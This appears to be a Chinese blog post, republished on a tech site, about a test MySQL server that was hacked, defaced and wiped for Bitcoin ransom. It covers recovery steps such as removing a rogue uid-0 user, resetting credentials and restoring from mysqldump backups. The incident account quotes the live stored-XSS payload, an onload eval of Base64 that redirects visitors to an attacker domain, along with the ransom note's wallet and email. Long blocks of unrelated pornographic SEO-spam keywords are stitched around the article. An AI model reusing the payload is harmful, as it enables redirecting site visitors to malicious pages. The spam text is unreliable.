精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

運維|MySQL 數據庫被黑,心力交瘁

數據庫
前一陣有一個測試用的 MySQL 數據庫被黑了,刪庫勒索的那種,這里記錄一下事情經過,給自己也敲個警鐘。

前一陣有一個測試用的 MySQL 數據庫被黑了,刪庫勒索的那種,這里記錄一下事情經過,給自己也敲個警鐘。

發現端倪

有一天,我在自測功能的時候,發現 APP 里展示的每條詳情信息里都有一段亂碼,只是有點奇怪,沒有特別在意,后來調試網頁的時候看到控制臺有個報錯,就順手看了一眼,發現詳情網頁里有這樣的東西:

找我的前端小伙伴討論了下,最后本地調試了一番,發現是數據庫里有個字段齊刷刷地被改成這個了:

<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vaHpyMGRtMjhtMTdjLmNvbS9lYm1zczBqcTc/a2V5PWM5MGEzMzYzMDEzYzVmY2FhZjhiZjVhOWE0ZTQwODZhIik="))>

atob 里面這一串是被 Base64 編碼的 window.location.replace("https://xxx.com/xxx"),所以這段代碼如果在網頁里被正常加載,網頁會被自動重定向到一個邪惡的網址:

是不是挺可怕?瀏覽網頁的人如果警惕性不高,可能就中招了。這時我明白過來,我的測試環境這是被當成肉雞了……

不過當時還是大意了,因為暫時沒有想通它是怎樣攻擊和篡改,以為就是從頁面注入的,就在邏輯里加了一些防護邏輯,把這個字段值都改回去然后就繼續干活了。

庫沒人懵

到第二天,正歡樂地測著功能呢,突然打開啥頁面都報數據庫異常了,到庫里一看,好家伙,所有表都沒了,只剩一張 readme,里面寫著:

以下數據庫已被刪除:xxx。我們有完整的備份。要恢復它,您必須向我們的比特幣地址bc1q8erv6l4xrdqsfpwp92gm0mccur49pqn8l8epfg支付0.016比特幣(BTC)。如果您需要證明,請通過以下電子郵件與我們聯系。song4372@proton.me 。任何與付款無關的郵件都將被忽略!

事情沒我想象的簡單!能把庫里的表都刪了,數據庫和服務器的權限怕是都被拿到了。

仔細回想了前一段時間里發生的事情,推測過程可能是這樣的:

  • 最開始,有一天接收到阿里云的告警,提示 AK 泄漏,查看事件日志發現利用 AK 創建了一個 RAM 子賬號,并賦予了高權限,當時我禁用了涉及的 AK,刪除了被創建的子賬號,但服務器應該已經被滲透了;
  • 然后就是數據庫字段被篡改,估計是一方面把服務器資源作為肉雞繼續擴散攻擊其它人,另一方面作為誘餌,監控處理動作;
  • 最后就是刪庫勒索了。

奪回權限

當務之急,是奪回權限,恢復數據。整個服務器和數據庫的權限應該都不安全了,所以我先采取了以下措施:

  • 檢查服務器安全組規則,發現被加入了允許公網訪問 3306 和所有端口的記錄,將其刪除;
  • 檢查服務器上的用戶,發現多了一個用戶 guest,uid 0,將其禁用;
  • 檢查進程,發現有用 guest 用戶啟動的 bash 進程和 mysql root 用戶進程,將其 kill 掉;
  • 修改服務器所有用戶密碼,檢查用戶權限;
  • 修改數據庫端口、重置所有用戶和密碼,只賦予用戶必要權限;
  • 更新服務器,修復已知安全漏洞;

用到的主要指令:

# 檢查 Linux 服務器上的用戶
cat /etc/passwd

# 修改用戶密碼
passwd <username>

# 檢查進程
ps -ef 

# 殺掉進程
kill -9 <pid>

# 修改數據庫端口
vim /etc/my.cnf

# mysql 刪除用戶,在 mysql 命令行執行
drop user '<user_name>'@'<scope>';
# mysql 創建用戶,賦予權限,在 mysql 命令行執行
create user '<user_name>'@'<scope>' IDENTIFIED BY '<password>';
grant select,insert,update,delete on '<database_name>'.* to '<user_name>'@'<scope>';

修復數據

接下來就是修復數據了。

這個測試用的 MySQL 實例開啟了 binlog,可惜被攻擊者清除了,所以只能從備份恢復了。數據用定時任務 + mysqldump,每天備份一次,找到合適的備份,恢復數據。

ps: 幸虧有備份,不然真是欲哭無淚了。

# 解壓備份文件
gunzip -c xxx.sql.gz > xxx.sql

# 恢復數據,在 mysql 命令行執行
use <database_name>;
souce /path/to/xxx.sql;

小結

以上的步驟的操作過程,遠沒有看起來那么簡單,實際耗費了我挺長時間。

這次事件讓我深刻地意識到,安全問題不容忽視,不管是服務器還是數據庫,都要做好安全措施,不要給攻擊者可乘之機。不然真到了被攻擊,而又自行恢復無望的時候,那就叫天天不應,叫地地不靈了。退一萬步說,即使有備份,也會耗費大量的時間和精力,影響正常的工作和生活。

安全任重道遠,后續先做好以下方面:

  • 訪問控制,只賦予必要權限;
  • 服務器鏡像、數據庫定期備份;
  • 定期漏洞掃描與修復;
  • 敏感數據加密;
  • 操作審計;

最后,警鐘常鳴!

責任編輯:趙寧寧 來源: 悶騷的程序員
相關推薦

2015-10-10 09:19:29

程序員編程工作熱情

2020-12-14 10:22:50

開發開源安全

2015-10-10 08:52:13

程序員疲勞

2018-12-14 11:04:56

數據庫運維智能

2018-09-18 09:36:52

運維數據庫智能

2019-04-25 15:35:37

MySQL數據庫運維Linux

2013-08-07 10:23:58

MySQL運維數據庫運維

2015-06-02 16:16:17

mysql優化mysql讀寫分離mysql主從復制

2019-01-15 18:03:54

數據庫運維 技術

2023-01-03 08:55:38

PG數據庫運維

2022-12-07 21:28:43

數據庫運維云原生

2025-09-15 06:40:00

Warpgate開源運維

2018-08-27 10:59:07

京東數據庫智能運維

2023-06-06 07:31:33

數據庫運維管理平臺

2024-04-22 08:15:50

數據庫運維工具

2018-05-02 14:30:33

數據庫運維優化故障

2018-05-08 09:49:15

數據庫運維優化

2014-02-19 13:30:05

運維安全數據庫
點贊
收藏

51CTO技術棧公眾號

蜜臀精品一区二区三区| 国产精品涩涩涩视频网站| 国产免费黄色大片| 在线高清一区| 亚洲免费小视频| 手机在线成人免费视频| 亚洲欧美成人影院| 久久久久久99精品| 99在线视频首页| 亚洲 国产 日韩 欧美| 国产精品久久久乱弄| 亚洲第一页在线| 麻豆一区二区三区视频| 欧美xxxx少妇| 国产精品女同互慰在线看| 99一区二区三区| 在线观看国产区| 亚洲黄色天堂| 久久精品国产久精国产思思| 国产精品第七页| 成人永久在线| 欧美性xxxx在线播放| 在线观看17c| 91亚洲精选| 久久久久久久综合狠狠综合| 97超级在线观看免费高清完整版电视剧| 中文字幕av一区| 亚洲一区三区电影在线观看| 成人爽a毛片一区二区| 美女www一区二区| 国产91精品久久久久久久| av最新在线观看| 国产成人影院| 日韩va亚洲va欧洲va国产| 99999精品| 国产成人福利夜色影视| 精品福利樱桃av导航| www.一区二区.com| 男人天堂久久久| 国产视频不卡一区| 久久青青草综合| 天天插天天干天天操| 国产精品一区二区你懂的| 国产精品青草久久久久福利99| 狠狠躁夜夜躁人人爽天天高潮| 欧美一区二区三区免费看| 中文字幕亚洲一区| 日本爱爱爱视频| 九九在线高清精品视频| 日韩精品久久久久久久玫瑰园| 稀缺小u女呦精品呦| 午夜精品在线| 精品国产免费视频| 绯色av蜜臀vs少妇| 97视频一区| 亚洲精品v欧美精品v日韩精品| 国产人妻精品午夜福利免费| 日韩欧美另类中文字幕| 精品裸体舞一区二区三区| 国产精品果冻传媒| 国产乱论精品| 亚洲精品网站在线播放gif| 亚洲成人av免费在线观看| 欧美一区自拍| 亚洲乱码av中文一区二区| 中文字幕一区二区人妻在线不卡| 亚洲黄页在线观看| 在线电影av不卡网址| 超薄肉色丝袜一二三| 欧美hd在线| 久久av在线播放| 青春草免费视频| 亚洲国产高清一区二区三区| 97视频国产在线| 天堂网视频在线| 美女脱光内衣内裤视频久久网站| 国产男人精品视频| a天堂在线视频| 99精品1区2区| 56国语精品自产拍在线观看| 2019日本中文字幕| 香蕉影院在线观看| 美国三级日本三级久久99| 成人黄色av网站| 亚洲国产综合一区| 91视频免费观看| 日韩精品久久一区| 18+激情视频在线| 图片区日韩欧美亚洲| 成人一区二区三| 久久青草免费| 欧美精品一区二区三区四区| 三上悠亚影音先锋| 欧美一区视频| 国产成人久久久精品一区| 一本色道久久综合无码人妻| 国产成人a级片| 欧美一区三区二区在线观看| 成年视频在线观看| 色欧美片视频在线观看| 天堂网成人在线| 台湾色综合娱乐中文网| 久久精品一偷一偷国产| 久久不卡免费视频| 精品一区二区在线观看| 蜜桃av噜噜一区二区三区| 美女av在线播放| 狠狠干狠狠久久| 91香蕉视频在线观看视频| 亚洲精品动态| 久久久久久综合网天天| 中文字幕在线网站| 91欧美一区二区| 日韩一二区视频| 在线一区视频观看| 亚洲国产91色在线| 国产十六处破外女视频| 日本不卡视频在线| 久久天天狠狠| 国产在线拍揄自揄拍视频| 欧美日韩在线播放一区| 久久福利小视频| 欧美成人久久| 国产精品午夜视频| 欧美精品少妇| 精品二区三区线观看| 精品国产aⅴ一区二区三区东京热 久久久久99人妻一区二区三区 | 在线免费观看高清视频| 97国产精品videossex| 国产欧美自拍视频| 久久天天久久| 中国日韩欧美久久久久久久久| 久久久午夜影院| 成人激情文学综合网| 一级全黄肉体裸体全过程| 日韩一区二区三区免费视频| 亚洲男人第一av网站| 日韩大片免费在线观看| 国产69精品久久久久毛片| 中文字幕av久久| 国产一区二区av在线| 色老头一区二区三区在线观看| 中文字幕视频网站| 91亚洲精品一区二区乱码| 久久国产精品网| 99精品在免费线中文字幕网站一区 | 中文字幕18页| 欧美精品一卡| 超碰97在线播放| 18aaaa精品欧美大片h| 日韩精品一区二区在线| 女性隐私黄www网站视频| 欧美大片aaa| 亚洲va天堂va国产va久| 在线观看你懂的视频| 可以在线观看的av网站| 亚洲一级二级三级| 色哟哟无码精品一区二区三区| 亚洲特色特黄| 操一操视频一区| bl在线肉h视频大尺度| 国产在线视频二区| 999在线观看精品免费不卡网站| 91九色在线观看| caoporn免费在线| 日韩欧美成人一区| 国产 日韩 欧美 成人| 成人免费不卡视频| 欧美啪啪免费视频| 九九免费精品视频在线观看| 国产精品久久久久久搜索| 视频一区视频二区中文| 91麻豆国产语对白在线观看| 日本三级在线视频| 欧美一区二区三区日韩| 麻豆疯狂做受xxxx高潮视频| 成年人午夜久久久| 午夜精品久久久内射近拍高清 | 日韩欧美一区在线| 亚欧洲精品在线视频| 99久久99久久久精品齐齐| 日韩 欧美 高清| 婷婷亚洲图片| 国产一区二区三区av在线| 成人性生活视频| 久久精品国产一区二区电影| 亚洲欧美国产高清va在线播放| 精品久久中文字幕| 九一在线免费观看| 成人一区在线观看| 成人亚洲精品777777大片| 在线看片不卡| 国产精品久久久久久久久免费高清 | 在线观看亚洲视频| www.天天干.com| 欧美日韩在线观看视频| 国精产品视频一二二区| 国产激情偷乱视频一区二区三区| 欧美成人xxxxx| 99久久久久国产精品| 狠狠色伊人亚洲综合网站色| 九九热线视频只有这里最精品| 精品激情国产视频| 男女视频在线观看免费| 91精品国产色综合久久不卡电影 | 亚洲精品高清视频| 国产精品成人自拍| 国产中文日韩欧美| 欧美gv在线观看| 久久久久99精品久久久久| 在线观看xxx| 日韩一级成人av| 中文字幕一区二区三区波野结| 亚洲影院理伦片| 亚洲精品一区二区三区在线播放| 99久久久国产精品| 波多野吉衣在线视频| 青青草一区二区三区| 免费无码不卡视频在线观看| 久久久美女视频| 亚洲精品一级二级三级| 92国产精品视频| 全球最大av网站久久| 57pao成人国产永久免费| 国产cdts系列另类在线观看| 伊人久久精品视频| 视频一区 中文字幕| 日韩精品一区二区三区视频在线观看 | 成人www视频在线观看| 欧美理论影院| 78色国产精品| 8x8ⅹ拨牐拨牐拨牐在线观看| 久久精品视频导航| 97视频精彩视频在线观看| 精品五月天久久| 完全免费av在线播放| 免费av手机在线观看| 国产一区日韩欧美| 日本xxxxx18| 亚洲国产精品日韩专区av有中文| 亚洲国产一区二区精品视频 | 免费成人蒂法| 国产美女精品在线观看| 成年网站在线播放| 亚洲性色视频| 中国女人做爰视频| 欧美日韩国产亚洲一区| 特级西西444| 欧美黄污视频| 成人性生活视频免费看| 久久精品国产亚洲av麻豆色欲| 丰满人妻一区二区三区无码av | 一区二区传媒有限公司| 精品9999| 春日野结衣av| 久久综合九色| 午夜视频你懂的| 精品综合免费视频观看| 午夜国产福利在线观看| 亚洲国产精品久久人人爱潘金莲| 欧美色大人视频| 亚洲综合免费视频| 欧美一区日韩一区| 亚洲风情第一页| 亚洲精品国精品久久99热| 日本在线视频1区| 一区二区三区视频免费在线观看 | 久久999免费视频| 女人天堂av在线播放| 性欧美长视频免费观看不卡| 亚洲性受xxx喷奶水| 国产精品国产三级国产专播精品人| 日本欧美韩国| 亚洲自拍小视频| 欧美男男freegayvideosroom| 欧美日韩成人一区二区三区| 日韩欧美大片| a天堂资源在线观看| 国产精品资源| aaa一级黄色片| 成人av手机在线观看| 加勒比综合在线| 最新日韩av在线| 国产精久久久久久| 在线观看不卡一区| www.黄色小说.com| 亚洲欧美一区二区三区情侣bbw| 成黄免费在线| 欧美xxxx做受欧美| 神马电影网我不卡| 国产精品一区二区精品| 国产福利精品视频| 91精品视频一区二区| 国产精品国产精品国产专区蜜臀ah| 日韩有码一区| 这里只有精品66| 香蕉久久夜色精品| 久久精品久久99| 91美女蜜桃在线| wwwav国产| 欧美性淫爽ww久久久久无| 亚洲国产综合网| 中文字幕无线精品亚洲乱码一区| 激情图片在线观看高清国产| 国产精品久久久久久久久久尿| 亚洲精品黑牛一区二区三区| 欧美日韩一区二| 亚洲日本欧美| 亚洲高清在线不卡| 欧美国产欧美亚州国产日韩mv天天看完整| 青青草原在线免费观看| 欧美三日本三级三级在线播放| 国 产 黄 色 大 片| 久久亚洲精品国产亚洲老地址| 另类专区亚洲| 狠狠色综合欧美激情| 在线观看免费一区二区| 中文久久久久久| 久久综合色8888| 精品一区免费观看| 日韩午夜av一区| 三区四区电影在线观看| 国产精品极品尤物在线观看 | 亚洲成人久久网| 成人免费网址| 国产主播欧美精品| 成人女性视频| 熟女人妇 成熟妇女系列视频| 99久久久久久| 国产成人亚洲精品自产在线 | 成年人在线观看av| 亚洲午夜激情av| 亚洲男女视频在线观看| 欧美日本高清视频| 精品国产亚洲一区二区三区大结局| 亚洲欧洲精品一区二区三区波多野1战4| 国产日本精品| 亚洲黄色免费在线观看| 调教+趴+乳夹+国产+精品| 国产91麻豆视频| 久久免费少妇高潮久久精品99| 99精品国产一区二区三区2021| 国产精品va在线观看无码| 国产精品一区二区91| 18成人在线| 欧美艳星介绍134位艳星| 国产偷人视频免费| 国产无一区二区| 国产美女www| 岛国av在线一区| 99色这里只有精品| 福利一区二区在线| www.youjizz.com亚洲| 亚洲成人在线网| 欧美少妇网站| 欧洲亚洲一区二区| 免费观看成人av| 久久久久人妻一区精品色| 欧美女孩性生活视频| 国产视频中文字幕在线观看| 亚洲一区二区三区sesese| 午夜国产精品视频| 四虎精品一区二区| 日韩欧美黄色动漫| 国产污视频在线| 成人精品一区二区三区电影免费| 亚洲欧美偷拍自拍| 精品一区二区三区四区五区六区| 香蕉加勒比综合久久| 日本私人网站在线观看| 国产大片精品免费永久看nba| 日韩欧美1区| 性感美女一区二区三区| 一本一道久久a久久精品| 最新av网站在线观看| 亚洲一区二区三区香蕉| 中文一区二区| 亚洲一级黄色录像| 欧美电影免费提供在线观看| 天堂电影一区| 一区二区三区四区五区精品 | 99在线热播| 性欧美暴力猛交另类hd| 中文字幕第69页| 亚洲精品一区二区三区四区高清| 在线毛片观看| 香蕉视频在线网址| 97精品久久久久中文字幕| 中国女人真人一级毛片| 欧美激情乱人伦| 精品久久成人| 国产精品无码自拍| 色播五月激情综合网| 色在线视频网| 日韩精品久久一区二区三区| 国产成人精品综合在线观看| 老熟妇仑乱一区二区av| 久99九色视频在线观看| 精品国产一区一区二区三亚瑟| 男生和女生一起差差差视频|